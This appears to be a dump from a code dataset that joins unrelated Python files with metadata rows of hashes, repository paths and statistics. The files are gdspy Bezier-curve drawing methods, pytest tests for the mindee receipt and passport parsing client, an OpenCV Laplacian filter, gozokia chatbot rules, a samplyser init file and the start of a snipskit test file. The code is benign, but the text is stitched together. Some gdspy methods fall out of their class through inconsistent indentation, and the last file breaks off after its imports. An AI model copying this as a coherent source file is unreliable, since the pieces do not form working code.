                    uu.insert(iu, test_u)
                    fu.insert(iu, test_pt)
                else:
                    iu += 1
            # Skip the first sample (current end point); remember the second
            # control point for the next smooth segment.
            self.points.extend(xy for xy in fu[1:])
            self.last_c = ctrl[2]
        return self
    def Q(self, *xy):
        """
        Add quadratic Bezier curves to the curve.
        Parameters
        ----------
        xy : numbers
            Coordinate pairs. Each set of 2 pairs are interpreted as
            the control point and the endpoint of the curve.
        Returns
        -------
        out : `Curve`
            This curve.
        """
        # A quadratic segment invalidates the smooth-cubic (S/s) state.
        self.last_c = None
        i = 0
        while i < len(xy):
            # Build the 3 quadratic control points: current end point plus 2
            # pairs consumed from xy (a complex number counts as one pair).
            ctrl = numpy.empty((3, 2))
            ctrl[0] = self.points[-1]
            for j in range(1, 3):
                if isinstance(xy[i], complex):
                    ctrl[j, 0] = xy[i].real
                    ctrl[j, 1] = xy[i].imag
                    i += 1
                else:
                    ctrl[j, 0] = xy[i]
                    ctrl[j, 1] = xy[i + 1]
                    i += 2
            # _func_bezier (imported from gdspy) evaluates the Bezier
            # defined by ctrl.
            f = _func_bezier(ctrl)
            uu = [0, 0.2, 0.5, 0.8, 1]
            fu = [f(u) for u in uu]
            iu = 1
            # Adaptive refinement: subdivide while the chord midpoint
            # deviates from the curve by more than the squared tolerance.
            while iu < len(fu):
                test_u = 0.5 * (uu[iu - 1] + uu[iu])
                test_pt = f(test_u)
                test_err = 0.5 * (fu[iu - 1] + fu[iu]) - test_pt
                if test_err[0] ** 2 + test_err[1] ** 2 > self.tol:
                    uu.insert(iu, test_u)
                    fu.insert(iu, test_pt)
                else:
                    iu += 1
            # Skip the first sample (current end point); remember the control
            # point for T/t mirroring.
            self.points.extend(xy for xy in fu[1:])
            self.last_q = ctrl[1]
        return self
    def q(self, *xy):
        """
        Add quadratic Bezier curves to the curve.
        Parameters
        ----------
        xy : numbers
            Coordinate pairs. Each set of 2 pairs are interpreted as
            the control point and the endpoint of the curve.
            All coordinates are relative to the current end point.
        Returns
        -------
        out : `Curve`
            This curve.
        """
        # A quadratic segment invalidates the smooth-cubic (S/s) state.
        self.last_c = None
        # NOTE: offsets are relative to the end point at the start of this
        # call (x0, y0); it is not updated between consecutive segments.
        x0, y0 = self.points[-1]
        i = 0
        while i < len(xy):
            ctrl = numpy.empty((3, 2))
            ctrl[0, 0] = x0
            ctrl[0, 1] = y0
            # Consume 2 pairs from xy; a complex number counts as one pair.
            for j in range(1, 3):
                if isinstance(xy[i], complex):
                    ctrl[j, 0] = x0 + xy[i].real
                    ctrl[j, 1] = y0 + xy[i].imag
                    i += 1
                else:
                    ctrl[j, 0] = x0 + xy[i]
                    ctrl[j, 1] = y0 + xy[i + 1]
                    i += 2
            # _func_bezier (imported from gdspy) evaluates the Bezier
            # defined by ctrl.
            f = _func_bezier(ctrl)
            uu = [0, 0.2, 0.5, 0.8, 1]
            fu = [f(u) for u in uu]
            iu = 1
            # Adaptive refinement: subdivide while the chord midpoint
            # deviates from the curve by more than the squared tolerance.
            while iu < len(fu):
                test_u = 0.5 * (uu[iu - 1] + uu[iu])
                test_pt = f(test_u)
                test_err = 0.5 * (fu[iu - 1] + fu[iu]) - test_pt
                if test_err[0] ** 2 + test_err[1] ** 2 > self.tol:
                    uu.insert(iu, test_u)
                    fu.insert(iu, test_pt)
                else:
                    iu += 1
            # Skip the first sample (current end point); remember the control
            # point for T/t mirroring.
            self.points.extend(xy for xy in fu[1:])
            self.last_q = ctrl[1]
        return self
    def T(self, *xy):
        """
        Add smooth quadratic Bezier curves to the curve.
        Parameters
        ----------
        xy : numbers
            Coordinates of the endpoints of the curves. The control
            point is assumed to be the reflection of the control point
            of the last curve relative to the starting point of the
            curve. If the previous curve is not a quadratic Bezier,
            the control point is coincident with the starting point.
        Returns
        -------
        out : `Curve`
            This curve.
        """
        # A quadratic segment invalidates the smooth-cubic (S/s) state.
        self.last_c = None
        # No previous quadratic: reflect about the current point itself.
        if self.last_q is None:
            self.last_q = self.points[-1]
        i = 0
        while i < len(xy):
            ctrl = numpy.empty((3, 2))
            ctrl[0] = self.points[-1]
            # Control point: reflection of the previous quadratic's control
            # point through the current end point.
            ctrl[1] = 2 * ctrl[0] - self.last_q
            # One endpoint per segment; a complex number counts as one pair.
            if isinstance(xy[i], complex):
                ctrl[2, 0] = xy[i].real
                ctrl[2, 1] = xy[i].imag
                i += 1
            else:
                ctrl[2, 0] = xy[i]
                ctrl[2, 1] = xy[i + 1]
                i += 2
            # _func_bezier (imported from gdspy) evaluates the Bezier
            # defined by ctrl.
            f = _func_bezier(ctrl)
            uu = [0, 0.2, 0.5, 0.8, 1]
            fu = [f(u) for u in uu]
            iu = 1
            # Adaptive refinement: subdivide while the chord midpoint
            # deviates from the curve by more than the squared tolerance.
            while iu < len(fu):
                test_u = 0.5 * (uu[iu - 1] + uu[iu])
                test_pt = f(test_u)
                test_err = 0.5 * (fu[iu - 1] + fu[iu]) - test_pt
                if test_err[0] ** 2 + test_err[1] ** 2 > self.tol:
                    uu.insert(iu, test_u)
                    fu.insert(iu, test_pt)
                else:
                    iu += 1
            # Skip the first sample (current end point); remember the control
            # point for the next smooth segment.
            self.points.extend(xy for xy in fu[1:])
            self.last_q = ctrl[1]
        return self
def t(self, *xy):
    """
    Add smooth quadratic Bezier curves to the curve.

    Parameters
    ----------
    xy : numbers
        Coordinates of the endpoints of the curves. The control
        point is assumed to be the reflection of the control point
        of the last curve relative to the starting point of the
        curve. If the previous curve is not a quadratic Bezier,
        the control point is coincident with the starting point.
        All coordinates are relative to the current end point.

    Returns
    -------
    out : `Curve`
        This curve.
    """
    # A quadratic segment invalidates any stored cubic control point.
    self.last_c = None
    # No previous quadratic control point: reflect about the current point.
    if self.last_q is None:
        self.last_q = self.points[-1]
    # NOTE(review): x0, y0 are captured once before the loop, so every
    # segment in a single call is offset from the same origin rather than
    # from the end of the previous segment -- confirm this matches the
    # intended "relative to the current end point" semantics upstream.
    x0, y0 = self.points[-1]
    i = 0
    while i < len(xy):
        ctrl = numpy.empty((3, 2))
        ctrl[0, 0] = x0
        ctrl[0, 1] = y0
        # Reflection of the previous control point about the start point.
        ctrl[1] = 2 * ctrl[0] - self.last_q
        # Endpoints may be complex numbers (x + yj) or flat (x, y) pairs.
        if isinstance(xy[i], complex):
            ctrl[2, 0] = x0 + xy[i].real
            ctrl[2, 1] = y0 + xy[i].imag
            i += 1
        else:
            ctrl[2, 0] = x0 + xy[i]
            ctrl[2, 1] = y0 + xy[i + 1]
            i += 2
        f = _func_bezier(ctrl)
        # Adaptive sampling: bisect intervals until the midpoint error is
        # within the curve tolerance.
        uu = [0, 0.2, 0.5, 0.8, 1]
        fu = [f(u) for u in uu]
        iu = 1
        while iu < len(fu):
            test_u = 0.5 * (uu[iu - 1] + uu[iu])
            test_pt = f(test_u)
            test_err = 0.5 * (fu[iu - 1] + fu[iu]) - test_pt
            if test_err[0] ** 2 + test_err[1] ** 2 > self.tol:
                uu.insert(iu, test_u)
                fu.insert(iu, test_pt)
            else:
                iu += 1
        # Append sampled points, skipping the (already stored) start point.
        self.points.extend(xy for xy in fu[1:])
        self.last_q = ctrl[1]
    return self
def B(self, *xy):
    """
    Add a general degree Bezier curve.

    Parameters
    ----------
    xy : numbers
        Coordinate pairs. The last coordinate is the endpoint of
        curve and all other are control points.

    Returns
    -------
    out : `Curve`
        This curve.
    """
    # A general Bezier invalidates both stored shorthand control points.
    self.last_c = self.last_q = None
    # Gather control points: current end point plus all given coordinates,
    # accepting either complex numbers (x + yj) or flat (x, y) pairs.
    control = [self.points[-1]]
    k = 0
    while k < len(xy):
        value = xy[k]
        if isinstance(value, complex):
            control.append((value.real, value.imag))
            k += 1
        else:
            control.append((value, xy[k + 1]))
            k += 2
    control = numpy.array(control)
    bezier = _func_bezier(control)
    # Initial parameter samples, denser near both ends of the curve.
    u_values = numpy.linspace(-1, 1, control.shape[0] + 1)
    u_values = list(0.5 * (1 + numpy.sign(u_values) * numpy.abs(u_values) ** 0.8))
    samples = [bezier(u) for u in u_values]
    idx = 1
    # Refine by bisection until every midpoint error is within tolerance.
    while idx < len(samples):
        u_mid = 0.5 * (u_values[idx - 1] + u_values[idx])
        p_mid = bezier(u_mid)
        err = 0.5 * (samples[idx - 1] + samples[idx]) - p_mid
        if err[0] ** 2 + err[1] ** 2 > self.tol:
            u_values.insert(idx, u_mid)
            samples.insert(idx, p_mid)
        else:
            idx += 1
    # Append sampled points, skipping the (already stored) start point.
    self.points.extend(samples[1:])
    return self
def b(self, *xy):
    """
    Add a general degree Bezier curve.

    Parameters
    ----------
    xy : numbers
        Coordinate pairs. The last coordinate is the endpoint of
        curve and all other are control points. All coordinates are
        relative to the current end point.

    Returns
    -------
    out : `Curve`
        This curve.
    """
    # A general Bezier invalidates both stored shorthand control points.
    self.last_c = self.last_q = None
    origin_x, origin_y = self.points[-1]
    # Gather control points: current end point plus all given coordinates
    # (complex numbers or flat pairs), offset by the current end point.
    control = [self.points[-1]]
    k = 0
    while k < len(xy):
        value = xy[k]
        if isinstance(value, complex):
            control.append((origin_x + value.real, origin_y + value.imag))
            k += 1
        else:
            control.append((origin_x + value, origin_y + xy[k + 1]))
            k += 2
    control = numpy.array(control)
    bezier = _func_bezier(control)
    # Initial parameter samples, denser near both ends of the curve.
    u_values = numpy.linspace(-1, 1, control.shape[0] + 1)
    u_values = list(0.5 * (1 + numpy.sign(u_values) * numpy.abs(u_values) ** 0.8))
    samples = [bezier(u) for u in u_values]
    idx = 1
    # Refine by bisection until every midpoint error is within tolerance.
    while idx < len(samples):
        u_mid = 0.5 * (u_values[idx - 1] + u_values[idx])
        p_mid = bezier(u_mid)
        err = 0.5 * (samples[idx - 1] + samples[idx]) - p_mid
        if err[0] ** 2 + err[1] ** 2 > self.tol:
            u_values.insert(idx, u_mid)
            samples.insert(idx, p_mid)
        else:
            idx += 1
    # Append sampled points, skipping the (already stored) start point.
    self.points.extend(samples[1:])
    return self
def I(
    self,
    points,
    angles=None,
    curl_start=1,
    curl_end=1,
    t_in=1,
    t_out=1,
    cycle=False,
):
    """
    Add a smooth interpolating curve through the given points.

    Uses the Hobby algorithm [1]_ to calculate a smooth
    interpolating curve made of cubic Bezier segments between each
    pair of points.

    Parameters
    ----------
    points : array-like[N][2]
        Vertices in the interpolating curve.
    angles : array-like[N + 1] or None
        Tangent angles at each point (in *radians*). Any angles
        defined as None are automatically calculated.
    curl_start : number
        Ratio between the mock curvatures at the first point and at
        its neighbor. A value of 1 renders the first segment a good
        approximation for a circular arc. A value of 0 will better
        approximate a straight segment. It has no effect for closed
        curves or when an angle is defined for the first point.
    curl_end : number
        Ratio between the mock curvatures at the last point and at
        its neighbor. It has no effect for closed curves or when an
        angle is defined for the first point.
    t_in : number or array-like[N + 1]
        Tension parameter when arriving at each point. One value
        per point or a single value used for all points.
    t_out : number or array-like[N + 1]
        Tension parameter when leaving each point. One value per
        point or a single value used for all points.
    cycle : bool
        If True, calculates control points for a closed curve,
        with an additional segment connecting the first and last
        points.

    Returns
    -------
    out : `Curve`
        This curve.

    Examples
    --------
    >>> c1 = gdspy.Curve(0, 1).I([(1, 1), (2, 1), (1, 0)])
    >>> c2 = gdspy.Curve(0, 2).I([(1, 2), (2, 2), (1, 1)],
    ...                          cycle=True)
    >>> ps = gdspy.PolygonSet([c1.get_points(), c2.get_points()])

    References
    ----------
    .. [1] Hobby, J.D. *Discrete Comput. Geom.* (1986) 1: 123.
       `DOI: 10.1007/BF02187690
       <https://doi.org/10.1007/BF02187690>`_
    """
    # Prepend the current end point so the curve starts where we left off.
    pts = numpy.vstack((self.points[-1:], points))
    # Hobby's algorithm yields two cubic control points per segment.
    cta, ctb = _hobby(pts, angles, curl_start, curl_end, t_in, t_out, cycle)
    args = []
    # Flatten (control1, control2, endpoint) per segment into the argument
    # list expected by the absolute cubic command C.
    args.extend(
        x
        for i in range(pts.shape[0] - 1)
        for x in [
            cta[i, 0],
            cta[i, 1],
            ctb[i, 0],
            ctb[i, 1],
            pts[i + 1, 0],
            pts[i + 1, 1],
        ]
    )
    if cycle:
        # Closing segment back to the first point.
        args.extend(
            [cta[-1, 0], cta[-1, 1], ctb[-1, 0], ctb[-1, 1], pts[0, 0], pts[0, 1]]
        )
    return self.C(*args)
def i(
    self,
    points,
    angles=None,
    curl_start=1,
    curl_end=1,
    t_in=1,
    t_out=1,
    cycle=False,
):
    """
    Add a smooth interpolating curve through the given points.

    Uses the Hobby algorithm [1]_ to calculate a smooth
    interpolating curve made of cubic Bezier segments between each
    pair of points.

    Parameters
    ----------
    points : array-like[N][2]
        Vertices in the interpolating curve (relative to the current
        endpoint).
    angles : array-like[N + 1] or None
        Tangent angles at each point (in *radians*). Any angles
        defined as None are automatically calculated.
    curl_start : number
        Ratio between the mock curvatures at the first point and at
        its neighbor. A value of 1 renders the first segment a good
        approximation for a circular arc. A value of 0 will better
        approximate a straight segment. It has no effect for closed
        curves or when an angle is defined for the first point.
    curl_end : number
        Ratio between the mock curvatures at the last point and at
        its neighbor. It has no effect for closed curves or when an
        angle is defined for the first point.
    t_in : number or array-like[N + 1]
        Tension parameter when arriving at each point. One value
        per point or a single value used for all points.
    t_out : number or array-like[N + 1]
        Tension parameter when leaving each point. One value per
        point or a single value used for all points.
    cycle : bool
        If True, calculates control points for a closed curve,
        with an additional segment connecting the first and last
        points.

    Returns
    -------
    out : `Curve`
        This curve.

    Examples
    --------
    >>> c1 = gdspy.Curve(0, 1).i([(1, 0), (2, 0), (1, -1)])
    >>> c2 = gdspy.Curve(0, 2).i([(1, 0), (2, 0), (1, -1)],
    ...                          cycle=True)
    >>> ps = gdspy.PolygonSet([c1.get_points(), c2.get_points()])

    References
    ----------
    .. [1] Hobby, J.D. *Discrete Comput. Geom.* (1986) 1: 123.
       `DOI: 10.1007/BF02187690
       <https://doi.org/10.1007/BF02187690>`_
    """
    # Shift the relative vertices by the current end point and prepend the
    # end point itself (as the zero offset) so the curve is continuous.
    pts = numpy.vstack((_zero.reshape((1, 2)), points)) + self.points[-1]
    # Hobby's algorithm yields two cubic control points per segment.
    cta, ctb = _hobby(pts, angles, curl_start, curl_end, t_in, t_out, cycle)
    args = []
    # Flatten (control1, control2, endpoint) per segment into the argument
    # list expected by the absolute cubic command C.
    args.extend(
        x
        for i in range(pts.shape[0] - 1)
        for x in [
            cta[i, 0],
            cta[i, 1],
            ctb[i, 0],
            ctb[i, 1],
            pts[i + 1, 0],
            pts[i + 1, 1],
        ]
    )
    if cycle:
        # Closing segment back to the first point.
        args.extend(
            [cta[-1, 0], cta[-1, 1], ctb[-1, 0], ctb[-1, 1], pts[0, 0], pts[0, 1]]
        )
    return self.C(*args)
| 32.791489
| 87
| 0.457274
| 3,986
| 30,824
| 3.478424
| 0.076769
| 0.012982
| 0.01731
| 0.026037
| 0.841327
| 0.83159
| 0.820988
| 0.81392
| 0.801442
| 0.794446
| 0
| 0.038713
| 0.423436
| 30,824
| 939
| 88
| 32.826411
| 0.741447
| 0.361147
| 0
| 0.810638
| 0
| 0
| 0.001745
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044681
| false
| 0
| 0.004255
| 0
| 0.097872
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fa34dbd6de13c6265a7ae2dcd2f5d05f5ab95657
| 6,434
|
py
|
Python
|
tests/test_client.py
|
fakela/mindee-api-python
|
09dce2ac28b639bcc431988ee300a401e0295642
|
[
"MIT"
] | null | null | null |
tests/test_client.py
|
fakela/mindee-api-python
|
09dce2ac28b639bcc431988ee300a401e0295642
|
[
"MIT"
] | null | null | null |
tests/test_client.py
|
fakela/mindee-api-python
|
09dce2ac28b639bcc431988ee300a401e0295642
|
[
"MIT"
] | null | null | null |
import pytest
from mindee import Client, Response, Receipt, Passport
from mindee.http import HTTPException
@pytest.fixture
def empty_client():
    """A client configured with no API tokens at all."""
    return Client()
@pytest.fixture
def dummy_client():
    """A client whose every endpoint token is a bogus placeholder."""
    token = "dummy"
    return Client(
        expense_receipt_token=token,
        invoice_token=token,
        passport_token=token,
        license_plate_token=token,
    )
@pytest.fixture
def dummy_client_dont_raise():
    """Like dummy_client, but configured to swallow HTTP errors."""
    token = "dummy"
    return Client(
        expense_receipt_token=token,
        invoice_token=token,
        passport_token=token,
        license_plate_token=token,
        raise_on_error=False,
    )
@pytest.fixture
def response():
    """A Response pre-loaded from the canned v3 receipt JSON."""
    path = "./tests/data/expense_receipts/v3/receipt.json"
    return Response.load(path)
# --- Parsing without the matching API token must be rejected. ---

def test_parse_receipt_without_token(empty_client):
    # No receipt token configured -> the client refuses outright.
    with pytest.raises(Exception):
        empty_client.parse_receipt("./tests/data/expense_receipts/receipt.jpg")


def test_parse_invoice_without_token(empty_client):
    with pytest.raises(Exception):
        empty_client.parse_invoice("./tests/data/expense_receipts/receipt.jpg")


def test_parse_financial_doc_without_token(empty_client):
    with pytest.raises(Exception):
        empty_client.parse_financial_document(
            "./tests/data/expense_receipts/receipt.jpg"
        )


def test_parse_passport_without_token(empty_client):
    with pytest.raises(Exception):
        empty_client.parse_passport("./tests/data/expense_receipts/receipt.jpg")


def test_parse_license_plate_without_token(empty_client):
    with pytest.raises(Exception):
        empty_client.parse_license_plate("./tests/data/license_plates/plate.png")
# --- Unsupported file extensions are rejected client-side (AssertionError),
# --- before any HTTP request is attempted.

def test_parse_receipt_with_wrong_filetype(dummy_client):
    # ".jpga" is not an accepted extension.
    with pytest.raises(AssertionError):
        dummy_client.parse_receipt("./tests/data/expense_receipts/receipt.jpga")


def test_parse_invoice_with_wrong_filetype(dummy_client):
    with pytest.raises(AssertionError):
        dummy_client.parse_invoice("./tests/data/expense_receipts/receipt.jpga")


def test_parse_financial_doc_with_wrong_filetype(dummy_client):
    with pytest.raises(AssertionError):
        dummy_client.parse_financial_document(
            "./tests/data/expense_receipts/receipt.jpga"
        )


def test_parse_passport_with_wrong_filetype(dummy_client):
    with pytest.raises(AssertionError):
        dummy_client.parse_passport("./tests/data/expense_receipts/receipt.jpga")


def test_parse_plate_with_wrong_filetype(dummy_client):
    with pytest.raises(AssertionError):
        dummy_client.parse_license_plate("./tests/data/expense_receipts/receipt.jpga")
# --- Requests that pass local validation but carry a bogus token fail at
# --- the HTTP layer (HTTPException).

def test_parse_receipt_with_wrong_token(dummy_client):
    with pytest.raises(HTTPException):
        dummy_client.parse_receipt("./tests/data/expense_receipts/receipt.jpg")


def test_parse_receipt_with_wrong_version(dummy_client):
    # A nonexistent API version ("4000") must also surface as an HTTP error.
    with pytest.raises(HTTPException):
        dummy_client.parse_receipt(
            "./tests/data/expense_receipts/receipt.jpg", version="4000"
        )


def test_parse_invoice_with_wrong_token(dummy_client):
    with pytest.raises(HTTPException):
        dummy_client.parse_invoice("./tests/data/expense_receipts/receipt.jpg")


def test_parse_financial_doc_with_wrong_token_jpg(dummy_client):
    with pytest.raises(HTTPException):
        dummy_client.parse_financial_document(
            "./tests/data/expense_receipts/receipt.jpg"
        )


def test_parse_financial_doc_with_wrong_token_pdf(dummy_client):
    # Same failure path for the PDF flavor of a financial document.
    with pytest.raises(HTTPException):
        dummy_client.parse_financial_document("./tests/data/invoices/invoice.pdf")


def test_parse_passport_with_wrong_token(dummy_client):
    with pytest.raises(HTTPException):
        dummy_client.parse_passport("./tests/data/expense_receipts/receipt.jpg")


def test_parse_license_plate_with_wrong_token(dummy_client):
    with pytest.raises(HTTPException):
        dummy_client.parse_license_plate("./tests/data/license_plates/plate.png")
def test_response_dump(response):
    # The loaded response exposes a parsed Receipt and can be re-serialized.
    assert isinstance(response.receipt, Receipt)
    response.dump("./tests/data/response_dump.json")


def test_response_dump_failure(response):
    # Dumping to an unopenable location must fail.
    with pytest.raises(Exception):
        response.dump(open("./tests/pathDoesNotExist/aaa"))


def test_response_load_failure():
    # Loading from a path that is not a file must fail.
    with pytest.raises(Exception):
        Response.load("notAFile")


def test_response_with_passport_type():
    # A passport JSON payload deserializes into a Passport document.
    response = Response.load("./tests/data/passport/v1/passport.json")
    assert isinstance(response.passport, Passport)
def test_request_with_filepath(dummy_client):
    """An explicit input_type='path' still fails on the bogus token."""
    receipt_path = "./tests/data/expense_receipts/receipt.jpg"
    with pytest.raises(HTTPException):
        dummy_client.parse_receipt(receipt_path, input_type="path")
def test_request_with_file(dummy_client):
    """Streaming a receipt file with a bogus token must fail with HTTPException.

    Fix: the original opened the file inline inside the ``pytest.raises``
    block and never closed it, leaking the handle (ResourceWarning).  A
    ``with`` block guarantees closure even though parse_receipt raises.
    """
    with open("./tests/data/expense_receipts/receipt.jpg", "rb") as fh:
        with pytest.raises(HTTPException):
            dummy_client.parse_receipt(fh, input_type="stream")
def test_request_with_base64_no_filename(dummy_client):
    """Base64 input without a filename is rejected client-side."""
    with open("./tests/data/expense_receipts/receipt.txt", "r") as fh:
        encoded = fh.read()
    with pytest.raises(AssertionError):
        dummy_client.parse_receipt(encoded, input_type="base64")
def test_request_with_base64(dummy_client):
    """Base64 input with a filename reaches the API and fails on the token."""
    with open("./tests/data/expense_receipts/receipt.txt", "r") as fh:
        encoded = fh.read()
    with pytest.raises(HTTPException):
        dummy_client.parse_receipt(encoded, input_type="base64", filename="receipt.txt")
def test_request_without_raise_on_error(dummy_client_dont_raise):
    """With raise_on_error=False a failed call yields an empty result."""
    receipt_path = "./tests/data/expense_receipts/receipt.jpg"
    result = dummy_client_dont_raise.parse_receipt(receipt_path, input_type="path")
    assert result.receipt is None
    assert len(result.receipts) == 0
def test_request_without_raise_on_error_include_words(dummy_client_dont_raise):
    """include_words=True does not change the empty result on failure."""
    receipt_path = "./tests/data/expense_receipts/receipt.jpg"
    result = dummy_client_dont_raise.parse_receipt(
        receipt_path,
        input_type="path",
        include_words=True,
    )
    assert result.receipt is None
    assert len(result.receipts) == 0
def test_request_with_file_wrong_type(dummy_client):
    """Mismatched input_type values are rejected client-side.

    Fix: the original called ``open(...)`` inline and never closed the
    handle (ResourceWarning); the ``with`` block guarantees closure even
    though parse_receipt raises.
    """
    with open("./tests/data/test.txt") as fh:
        with pytest.raises(AssertionError):
            dummy_client.parse_receipt(fh, input_type="file")
    with pytest.raises(AssertionError):
        dummy_client.parse_receipt("./tests/data/test.txt", input_type="path")
def test_pdf_reconstruct(dummy_client):
    """A multi-page PDF invoice must fail with HTTPException on a bogus token."""
    invoice_path = "./tests/data/invoices/invoice_6p.pdf"
    with pytest.raises(HTTPException):
        dummy_client.parse_invoice(invoice_path)
| 31.082126
| 88
| 0.745415
| 810
| 6,434
| 5.577778
| 0.107407
| 0.104692
| 0.092076
| 0.111554
| 0.826915
| 0.780655
| 0.74834
| 0.725764
| 0.701638
| 0.655157
| 0
| 0.004563
| 0.14843
| 6,434
| 206
| 89
| 31.23301
| 0.82004
| 0
| 0
| 0.42446
| 0
| 0
| 0.195368
| 0.179049
| 0
| 0
| 0
| 0
| 0.100719
| 1
| 0.23741
| false
| 0.086331
| 0.021583
| 0.028777
| 0.28777
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
fa60f67080da9b568eeb391fc2b1ef84202297b5
| 149
|
py
|
Python
|
protoseg/filters/laplacian.py
|
chriamue/protoseg
|
4ddc7d613aadcb9d25b5773eff688214349ab23f
|
[
"MIT"
] | null | null | null |
protoseg/filters/laplacian.py
|
chriamue/protoseg
|
4ddc7d613aadcb9d25b5773eff688214349ab23f
|
[
"MIT"
] | null | null | null |
protoseg/filters/laplacian.py
|
chriamue/protoseg
|
4ddc7d613aadcb9d25b5773eff688214349ab23f
|
[
"MIT"
] | 1
|
2020-03-30T07:10:54.000Z
|
2020-03-30T07:10:54.000Z
|
import cv2
def laplacian(img):
    """Return the Laplacian edge response of *img* as an 8-bit image."""
    edges = cv2.Laplacian(img, cv2.CV_8U)
    return edges
def addlaplacian(img):
    """Return *img* with its Laplacian edge response added on top."""
    return img + laplacian(img)
| 16.555556
| 40
| 0.697987
| 21
| 149
| 4.904762
| 0.47619
| 0.349515
| 0.349515
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033613
| 0.201342
| 149
| 9
| 41
| 16.555556
| 0.831933
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
ad139a23fac23272ed38c73729e91aaa30e52968
| 887
|
py
|
Python
|
gozokia/rules/bar.py
|
avara1986/gozokia
|
03da46359c4a97a35b8f94686cccec7fc9b438cd
|
[
"MIT-0",
"MIT"
] | null | null | null |
gozokia/rules/bar.py
|
avara1986/gozokia
|
03da46359c4a97a35b8f94686cccec7fc9b438cd
|
[
"MIT-0",
"MIT"
] | null | null | null |
gozokia/rules/bar.py
|
avara1986/gozokia
|
03da46359c4a97a35b8f94686cccec7fc9b438cd
|
[
"MIT-0",
"MIT"
] | null | null | null |
from gozokia.core.rules import RuleBase
class Bar(RuleBase):
    """Demo rule that fires whenever the sentence is exactly 'foo'."""

    def __init__(self):
        # One-shot rule: do not reload after completion.
        self.set_reload(False)

    def condition_raise(self, *args, **kwargs):
        # Let the base class process the input before inspecting it.
        super(Bar, self).condition_raise(*args, **kwargs)
        if self.sentence.lower() == 'foo':
            return True

    def condition_completed(self, *args, **kwargs):
        self.set_completed()

    def response(self, *args, **kwargs):
        self.response_output = 'bar'
class BarSecond(RuleBase):
    """Second demo rule triggered by the same 'foo' sentence."""

    def __init__(self):
        # One-shot rule: do not reload after completion.
        self.set_reload(False)

    def condition_raise(self, *args, **kwargs):
        # Let the base class process the input before inspecting it.
        super(BarSecond, self).condition_raise(*args, **kwargs)
        if self.sentence.lower() == 'foo':
            return True

    def condition_completed(self, *args, **kwargs):
        self.set_completed()

    def response(self, *args, **kwargs):
        self.response_output = 'bar second'
| 24.638889
| 63
| 0.624577
| 103
| 887
| 5.184466
| 0.291262
| 0.149813
| 0.157303
| 0.134831
| 0.861423
| 0.861423
| 0.861423
| 0.861423
| 0.861423
| 0.861423
| 0
| 0
| 0.240135
| 887
| 35
| 64
| 25.342857
| 0.792285
| 0
| 0
| 0.695652
| 0
| 0
| 0.021421
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.347826
| false
| 0
| 0.043478
| 0
| 0.565217
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
ad20b7730c9f14ed109d20df970e4aa7b9a0d870
| 154
|
py
|
Python
|
samplyser/__init__.py
|
uummoo/samplyser
|
5fe245332b3488a9d3beac87914ef4d309ef4451
|
[
"MIT"
] | null | null | null |
samplyser/__init__.py
|
uummoo/samplyser
|
5fe245332b3488a9d3beac87914ef4d309ef4451
|
[
"MIT"
] | null | null | null |
samplyser/__init__.py
|
uummoo/samplyser
|
5fe245332b3488a9d3beac87914ef4d309ef4451
|
[
"MIT"
] | null | null | null |
from samplyser import pitch
from samplyser import duration
from samplyser import amplitude
from samplyser import spectrum
from samplyser.analyse import *
| 25.666667
| 31
| 0.857143
| 20
| 154
| 6.6
| 0.4
| 0.492424
| 0.575758
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12987
| 154
| 5
| 32
| 30.8
| 0.985075
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ad3600d6b2906005cca057f07e12c4add8ccb2d3
| 6,034
|
py
|
Python
|
tests/mqtt/test_apps_mqtt.py
|
fossabot/snipskit
|
57fe329bf302f863bf190b2cfe1175e13d1d017e
|
[
"MIT"
] | 12
|
2019-03-18T13:03:46.000Z
|
2019-08-14T03:13:32.000Z
|
tests/mqtt/test_apps_mqtt.py
|
fossabot/snipskit
|
57fe329bf302f863bf190b2cfe1175e13d1d017e
|
[
"MIT"
] | 4
|
2019-04-05T07:14:59.000Z
|
2019-12-06T23:51:31.000Z
|
tests/mqtt/test_apps_mqtt.py
|
fossabot/snipskit
|
57fe329bf302f863bf190b2cfe1175e13d1d017e
|
[
"MIT"
] | 4
|
2019-05-01T07:56:20.000Z
|
2019-11-17T13:54:59.000Z
|
"""Tests for the `snipskit.apps.MQTTSnipsApp` class."""
from snipskit.mqtt.apps import MQTTSnipsApp
from snipskit.config import AppConfig, SnipsConfig
